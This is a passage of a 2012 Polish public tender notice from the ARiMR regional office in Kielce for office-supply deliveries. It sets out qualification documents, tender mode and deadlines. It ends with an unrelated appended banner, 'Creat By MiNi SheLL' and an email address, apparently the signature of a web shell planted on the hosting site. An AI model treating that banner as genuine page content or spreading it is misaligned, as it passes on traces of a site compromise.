a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, co najmniej dwóch dostaw materiałów biurowych o wartości 200 000,00 zł brutto każda oraz dokumenty potwierdzające, że te dostawy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o braku podstaw do wykluczenia</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o braku podstaw do wykluczenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie o braku podstaw do wykluczenia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl/o-arimr/przetargi/przetargi-organizowane-przez-oddzialy-regionalne/or13-swietokrzys<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa Świętokrzyski Oddział Regionalny ul. Warszawska 430, 25 - 414 Kielce, pokój 212.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.07.2012 godzina 09:30, miejsce: Agencja Restrukturyzacji i Modernizacji Rolnictwa Świętokrzyski Oddział Regionalny ul. Warszawska 430, 25 - 414 Kielce, pokój 212.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com